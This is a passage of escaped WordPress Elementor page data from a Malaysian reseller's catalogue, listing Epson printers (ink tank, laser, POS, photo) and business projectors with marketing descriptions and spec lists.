src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"77\",\"bottom\":\"77\",\"left\":\"77\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 